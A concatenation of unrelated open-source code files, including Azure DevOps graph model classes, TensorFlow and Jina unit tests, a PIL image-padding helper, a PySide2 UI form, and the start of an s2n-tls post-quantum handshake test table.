:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is now backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc)
:type domain: str
:param mail_address: The email address of record for a given graph member. This may be different than the principal name.
:type mail_address: str
:param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS.
:type principal_name: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'mail_address': {'key': 'mailAddress', 'type': 'str'},
'principal_name': {'key': 'principalName', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None):
super(GraphMember, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind)
self.domain = domain
self.mail_address = mail_address
self.principal_name = principal_name
class GraphScope(GraphSubject):
"""
Container where a graph entity is defined (organization, project, team)
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is now backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param administrator_descriptor: The subject descriptor that references the administrators group for this scope. Only members of this group can change the contents of this scope or assign other users permissions to access this scope.
:type administrator_descriptor: str
:param is_global: When true, this scope is also a securing host for one or more scopes.
:type is_global: bool
:param parent_descriptor: The subject descriptor for the closest account or organization in the ancestor tree of this scope.
:type parent_descriptor: str
:param scope_type: The type of this scope. Typically ServiceHost or TeamProject.
:type scope_type: object
:param securing_host_descriptor: The subject descriptor for the containing organization in the ancestor tree of this scope.
:type securing_host_descriptor: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'administrator_descriptor': {'key': 'administratorDescriptor', 'type': 'str'},
'is_global': {'key': 'isGlobal', 'type': 'bool'},
'parent_descriptor': {'key': 'parentDescriptor', 'type': 'str'},
'scope_type': {'key': 'scopeType', 'type': 'object'},
'securing_host_descriptor': {'key': 'securingHostDescriptor', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, administrator_descriptor=None, is_global=None, parent_descriptor=None, scope_type=None, securing_host_descriptor=None):
super(GraphScope, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind)
self.administrator_descriptor = administrator_descriptor
self.is_global = is_global
self.parent_descriptor = parent_descriptor
self.scope_type = scope_type
self.securing_host_descriptor = securing_host_descriptor
class GraphUser(GraphMember):
"""
Graph user entity
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is now backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc)
:type domain: str
:param mail_address: The email address of record for a given graph member. This may be different than the principal name.
:type mail_address: str
:param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS.
:type principal_name: str
:param directory_alias: The short, generally unique name for the user in the backing directory. For AAD users, this corresponds to the mail nickname, which is often but not necessarily similar to the part of the user's mail address before the @ sign. For GitHub users, this corresponds to the GitHub user handle.
:type directory_alias: str
:param is_deleted_in_origin: When true, the user has been deleted in the identity provider
:type is_deleted_in_origin: bool
:param metadata_update_date:
:type metadata_update_date: datetime
:param meta_type: The meta type of the user in the origin, such as "member", "guest", etc. See UserMetaType for the set of possible values.
:type meta_type: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'mail_address': {'key': 'mailAddress', 'type': 'str'},
'principal_name': {'key': 'principalName', 'type': 'str'},
'directory_alias': {'key': 'directoryAlias', 'type': 'str'},
'is_deleted_in_origin': {'key': 'isDeletedInOrigin', 'type': 'bool'},
'metadata_update_date': {'key': 'metadataUpdateDate', 'type': 'iso-8601'},
'meta_type': {'key': 'metaType', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None, directory_alias=None, is_deleted_in_origin=None, metadata_update_date=None, meta_type=None):
super(GraphUser, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind, domain=domain, mail_address=mail_address, principal_name=principal_name)
self.directory_alias = directory_alias
self.is_deleted_in_origin = is_deleted_in_origin
self.metadata_update_date = metadata_update_date
self.meta_type = meta_type
class GraphGroup(GraphMember):
"""
Graph group entity
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is now backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc)
:type domain: str
:param mail_address: The email address of record for a given graph member. This may be different than the principal name.
:type mail_address: str
:param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS.
:type principal_name: str
:param description: A short phrase to help human readers disambiguate groups with similar names
:type description: str
:param is_cross_project:
:type is_cross_project: bool
:param is_deleted:
:type is_deleted: bool
:param is_global_scope:
:type is_global_scope: bool
:param is_restricted_visible:
:type is_restricted_visible: bool
:param local_scope_id:
:type local_scope_id: str
:param scope_id:
:type scope_id: str
:param scope_name:
:type scope_name: str
:param scope_type:
:type scope_type: str
:param securing_host_id:
:type securing_host_id: str
:param special_type:
:type special_type: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'mail_address': {'key': 'mailAddress', 'type': 'str'},
'principal_name': {'key': 'principalName', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'is_cross_project': {'key': 'isCrossProject', 'type': 'bool'},
'is_deleted': {'key': 'isDeleted', 'type': 'bool'},
'is_global_scope': {'key': 'isGlobalScope', 'type': 'bool'},
'is_restricted_visible': {'key': 'isRestrictedVisible', 'type': 'bool'},
'local_scope_id': {'key': 'localScopeId', 'type': 'str'},
'scope_id': {'key': 'scopeId', 'type': 'str'},
'scope_name': {'key': 'scopeName', 'type': 'str'},
'scope_type': {'key': 'scopeType', 'type': 'str'},
'securing_host_id': {'key': 'securingHostId', 'type': 'str'},
'special_type': {'key': 'specialType', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None, description=None, is_cross_project=None, is_deleted=None, is_global_scope=None, is_restricted_visible=None, local_scope_id=None, scope_id=None, scope_name=None, scope_type=None, securing_host_id=None, special_type=None):
super(GraphGroup, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind, domain=domain, mail_address=mail_address, principal_name=principal_name)
self.description = description
self.is_cross_project = is_cross_project
self.is_deleted = is_deleted
self.is_global_scope = is_global_scope
self.is_restricted_visible = is_restricted_visible
self.local_scope_id = local_scope_id
self.scope_id = scope_id
self.scope_name = scope_name
self.scope_type = scope_type
self.securing_host_id = securing_host_id
self.special_type = special_type
__all__ = [
'Avatar',
'GraphCachePolicies',
'GraphDescriptorResult',
'GraphFederatedProviderData',
'GraphGroupCreationContext',
'GraphMembership',
'GraphMembershipState',
'GraphMembershipTraversal',
'GraphProviderInfo',
'GraphScopeCreationContext',
'GraphStorageKeyResult',
'GraphSubjectBase',
'GraphSubjectLookup',
'GraphSubjectLookupKey',
'GraphUserCreationContext',
'GraphUserUpdateContext',
'JsonPatchOperation',
'PagedGraphGroups',
'PagedGraphUsers',
'ReferenceLinks',
'GraphSubject',
'GraphMember',
'GraphScope',
'GraphUser',
'GraphGroup',
]
|
official/vision/beta/projects/yolo/modeling/heads/yolo_head_test.py | NasTul/models | 82,518 | 12635031 | <gh_stars>1000+
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for yolo heads."""
# Import libraries
from absl.testing import parameterized
import tensorflow as tf
from official.vision.beta.projects.yolo.modeling.heads import yolo_head as heads
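# Note: for every feature level the head should emit a tensor whose last dimension is
# (num_classes + 5) * boxes_per_level, the usual YOLO layout of 4 box offsets plus
# 1 objectness score plus the class scores, repeated for each anchor box. The shape
# assertions below rely on that layout.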
class YoloDecoderTest(parameterized.TestCase, tf.test.TestCase):
def test_network_creation(self):
"""Test creation of YOLO family models."""
tf.keras.backend.set_image_data_format('channels_last')
input_shape = {
'3': [1, 52, 52, 256],
'4': [1, 26, 26, 512],
'5': [1, 13, 13, 1024]
}
classes = 100
bps = 3
head = heads.YoloHead(3, 5, classes=classes, boxes_per_level=bps)
inputs = {}
for key in input_shape:
inputs[key] = tf.ones(input_shape[key], dtype=tf.float32)
endpoints = head(inputs)
# print(endpoints)
for key in endpoints.keys():
expected_input_shape = input_shape[key]
expected_input_shape[-1] = (classes + 5) * bps
self.assertAllEqual(endpoints[key].shape.as_list(), expected_input_shape)
def test_serialize_deserialize(self):
# Create a network object that sets all of its config options.
tf.keras.backend.set_image_data_format('channels_last')
input_shape = {
'3': [1, 52, 52, 256],
'4': [1, 26, 26, 512],
'5': [1, 13, 13, 1024]
}
classes = 100
bps = 3
head = heads.YoloHead(3, 5, classes=classes, boxes_per_level=bps)
inputs = {}
for key in input_shape:
inputs[key] = tf.ones(input_shape[key], dtype=tf.float32)
_ = head(inputs)
configs = head.get_config()
head_from_config = heads.YoloHead.from_config(configs)
self.assertAllEqual(head.get_config(), head_from_config.get_config())
if __name__ == '__main__':
tf.test.main()
|
tests/unit/test_is_decompressed_message.py | vishalbelsare/jina | 15,179 | 12635033 | <gh_stars>1000+
import time
from jina.helper import random_identity
from jina.logging.predefined import default_logger
from jina.parsers import set_pea_parser
from jina.peapods.runtimes.zmq.zed import ZEDRuntime
from jina.peapods.peas import BasePea
from jina.peapods.zmq import Zmqlet
from jina.types.message import Message
from jina.types.request import Request
from jina import Executor, requests
from tests import validate_callback
class DecompressExec(Executor):
@requests()
def func(self, docs, **kwargs):
for doc in docs:
doc.text = 'used'
class MockRuntimeNotDecompressed(ZEDRuntime):
def _post_hook(self, msg: 'Message'):
super()._post_hook(msg)
if msg is not None:
decompressed = msg.request.is_decompressed
if msg.is_data_request:
assert not decompressed
return msg
class MockRuntimeDecompressed(ZEDRuntime):
def _post_hook(self, msg: 'Message'):
super()._post_hook(msg)
if msg is not None:
decompressed = msg.request.is_decompressed
if msg.is_data_request:
assert decompressed
return msg
class MockPea(BasePea):
def _get_runtime_cls(self):
if self.args.runtime_cls == 'MockRuntimeNotDecompressed':
return MockRuntimeNotDecompressed
else:
return MockRuntimeDecompressed
args1 = set_pea_parser().parse_args(
[
'--host-in',
'0.0.0.0',
'--host-out',
'0.0.0.0',
'--socket-in',
'PULL_CONNECT',
'--socket-out',
'PUSH_CONNECT',
]
)
args2 = set_pea_parser().parse_args(
[
'--host-in',
'0.0.0.0',
'--host-out',
'0.0.0.0',
'--port-in',
str(args1.port_out),
'--port-out',
str(args1.port_in),
'--socket-in',
'PULL_BIND',
'--socket-out',
'PUSH_BIND',
'--runtime-cls',
'MockRuntimeNotDecompressed',
]
)
args3 = set_pea_parser().parse_args(
[
'--host-in',
'0.0.0.0',
'--host-out',
'0.0.0.0',
'--port-in',
str(args1.port_out),
'--port-out',
str(args1.port_in),
'--socket-in',
'PULL_BIND',
'--socket-out',
'PUSH_BIND',
'--uses',
'DecompressExec',
'--runtime-cls',
'MockRuntimeDecompressed',
]
)
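# How the three argument sets fit together: args1 drives the test-harness Zmqlet
# (PULL_CONNECT/PUSH_CONNECT), while args2 and args3 describe the peas under test,
# bound on the mirrored ports. args2 runs no executor, so MockRuntimeNotDecompressed
# expects data requests to still be compressed after handling; args3 runs
# DecompressExec, which touches the documents, so MockRuntimeDecompressed expects the
# request to have been decompressed by the time _post_hook runs.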
def test_not_decompressed_zmqlet(mocker):
with MockPea(args2) as pea, Zmqlet(args1, default_logger) as z:
req = Request()
req.request_id = random_identity()
d = req.data.docs.add()
d.tags['id'] = 2
msg = Message(None, req, 'tmp', '')
mock = mocker.Mock()
z.send_message(msg)
time.sleep(1)
z.recv_message(mock)
def callback(msg_):
pass
validate_callback(mock, callback)
print(f' joining pea')
pea.join()
print(f' joined pea')
def test_decompressed_zmqlet(mocker):
with MockPea(args3) as pea, Zmqlet(args1, default_logger) as z:
req = Request()
req.request_id = random_identity()
d = req.data.docs.add()
d.tags['id'] = 2
msg = Message(None, req, 'tmp', '')
mock = mocker.Mock()
z.send_message(msg)
time.sleep(1)
z.recv_message(mock)
def callback(msg_):
pass
validate_callback(mock, callback)
print(f' joining pea')
pea.join()
print(f' joined pea')
def test_recv_message_zmqlet(mocker):
zmqlet1 = Zmqlet(args1, default_logger)
zmqlet2 = Zmqlet(args2, default_logger)
req = Request()
req.request_id = random_identity()
doc = req.data.docs.add()
doc.tags['id'] = 2
msg = Message(None, req, 'tmp', '')
def callback(msg_):
assert msg_.request.docs[0].tags['id'] == msg.request.data.docs[0].tags['id']
mock = mocker.Mock()
zmqlet1.send_message(msg)
time.sleep(1)
zmqlet2.recv_message(mock)
validate_callback(mock, callback)
|
pkg/win32/Python27/Lib/site-packages/klei/imgutil.py | hexgear-studio/ds_mod_tools | 112 | 12635034 | from PIL import Image, ImageOps
def Expand( im, border_size ):
new_img = ImageOps.expand( im, border = border_size )
for i in range( border_size ):
left = border_size - i
right = border_size + im.size[0] + i
top = border_size - i
bottom = border_size + im.size[1] + i - 1
top_line = new_img.crop( ( left, top, right, top + 1 ) )
bottom_line = new_img.crop( ( left, bottom, right, bottom + 1 ) )
new_img.paste( top_line, ( left, top - 1, right, top ) )
new_img.paste( bottom_line, ( left, bottom + 1, right, bottom + 2 ) )
left_line = new_img.crop( ( left, top - 1, left + 1, bottom + 2 ) )
right_line = new_img.crop( ( right-1, top - 1, right, bottom + 2 ) )
new_img.paste( left_line, ( left - 1, top - 1, left, bottom + 2 ) )
new_img.paste( right_line, ( right, top - 1, right + 1, bottom + 2 ) )
return new_img
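# Expand() grows the image by `border_size` pixels on every side and then copies the
# outermost rows and columns outward, so the padding repeats the edge pixels instead of
# staying black. This is presumably meant to stop texture filtering at atlas edges from
# bleeding in the fill colour.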
def OpenImage( filename, size=None, border_size = 0 ):
im = Image.open( filename )
if size != None:
im = im.resize( size, Image.ANTIALIAS )
im = Expand( im, border_size )
return im
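# Illustrative usage (file names here are hypothetical):
# im = OpenImage("icon.png", size=(64, 64), border_size=2)
# im.save("icon_padded.png")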
|
tests/collisions/apps.py | KazakovDenis/django-extensions | 4,057 | 12635061 | <filename>tests/collisions/apps.py
# -*- coding: utf-8 -*-
from django.apps import AppConfig
class FooConfig(AppConfig):
name = 'tests.collisions'
app_label = 'collisions'
|
zhihu_user_info_spider/data_analysis/test/pandas_test.py | Yourrrrlove/spider_collection | 178 | 12635065 | <filename>zhihu_user_info_spider/data_analysis/test/pandas_test.py
import pandas as pd
import numpy as np
df = pd.read_csv(
r"D:\pycharm\PyCharm 2020.1.1\workplace\zhihu_user_info\zhihu_user_info_spider\result\userInfo\2021\10\17\user_info_low_cleaned.csv")
df1 = df.drop_duplicates(subset="id")
print(df1.groupby("所在行业").size())
# print(df1.pivot_table)
# print(df1["id"].value_counts())
|
src/GridCal/Gui/GIS/gui.py | mzy2240/GridCal | 284 | 12635069 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui',
# licensing of 'gui.ui' applies.
#
# Created: Mon Dec 9 12:39:51 2019
# by: pyside2-uic running on PySide2 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_GisWindow(object):
def setupUi(self, GisWindow):
GisWindow.setObjectName("GisWindow")
GisWindow.resize(938, 577)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/icons/map.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
GisWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(GisWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.webFrame = QtWidgets.QFrame(self.centralwidget)
self.webFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.webFrame.setFrameShadow(QtWidgets.QFrame.Raised)
self.webFrame.setObjectName("webFrame")
self.verticalLayout.addWidget(self.webFrame)
GisWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(GisWindow)
self.statusbar.setObjectName("statusbar")
GisWindow.setStatusBar(self.statusbar)
self.toolBar = QtWidgets.QToolBar(GisWindow)
self.toolBar.setMovable(False)
self.toolBar.setFloatable(False)
self.toolBar.setObjectName("toolBar")
GisWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.actionSave_map = QtWidgets.QAction(GisWindow)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/icons/icons/savec.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionSave_map.setIcon(icon1)
self.actionSave_map.setObjectName("actionSave_map")
self.toolBar.addAction(self.actionSave_map)
self.retranslateUi(GisWindow)
QtCore.QMetaObject.connectSlotsByName(GisWindow)
def retranslateUi(self, GisWindow):
GisWindow.setWindowTitle(QtWidgets.QApplication.translate("GisWindow", "GridCal - GIS", None, -1))
self.toolBar.setWindowTitle(QtWidgets.QApplication.translate("GisWindow", "toolBar", None, -1))
self.actionSave_map.setText(QtWidgets.QApplication.translate("GisWindow", "Save map", None, -1))
self.actionSave_map.setToolTip(QtWidgets.QApplication.translate("GisWindow", "Save this map", None, -1))
self.actionSave_map.setShortcut(QtWidgets.QApplication.translate("GisWindow", "Ctrl+S", None, -1))
from .icons_rc import *
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
GisWindow = QtWidgets.QMainWindow()
ui = Ui_GisWindow()
ui.setupUi(GisWindow)
GisWindow.show()
sys.exit(app.exec_())
|
tests/integrationv2/test_pq_handshake.py | hongxu-jia/s2n-tls | 4,256 | 12635078 | <gh_stars>1000+
import pytest
import os
from configuration import available_ports, PROVIDERS, PROTOCOLS
from common import Ciphers, ProviderOptions, Protocols, data_bytes, KemGroups, Certificates, pq_enabled
from fixtures import managed_process
from providers import Provider, S2N, OpenSSL
from utils import invalid_test_parameters, get_parameter_name, to_bytes
CIPHERS = [
None, # `None` will default to the appropriate `test_all` cipher preference in the S2N client provider
Ciphers.KMS_PQ_TLS_1_0_2019_06,
Ciphers.KMS_PQ_TLS_1_0_2020_02,
Ciphers.KMS_PQ_TLS_1_0_2020_07,
Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11,
Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02,
Ciphers.KMS_TLS_1_0_2018_10,
Ciphers.PQ_TLS_1_0_2020_12,
]
KEM_GROUPS = [
KemGroups.P256_KYBER512R2,
KemGroups.P256_BIKE1L1FOR2,
KemGroups.P256_SIKEP434R3,
]
EXPECTED_RESULTS = {
# The tuple keys have the form (client_{cipher, kem_group}, server_{cipher, kem_group})
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp434r3-KEM", "kem_group": "NONE"},
(Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp434r3-KEM", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_TLS_1_0_2018_10):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_TLS_1_0_2018_10):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_TLS_1_0_2018_10):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2019_06):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2020_02):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
(Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2020_07):
{"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"},
# The expected kem_group string for this case purposefully excludes a curve;
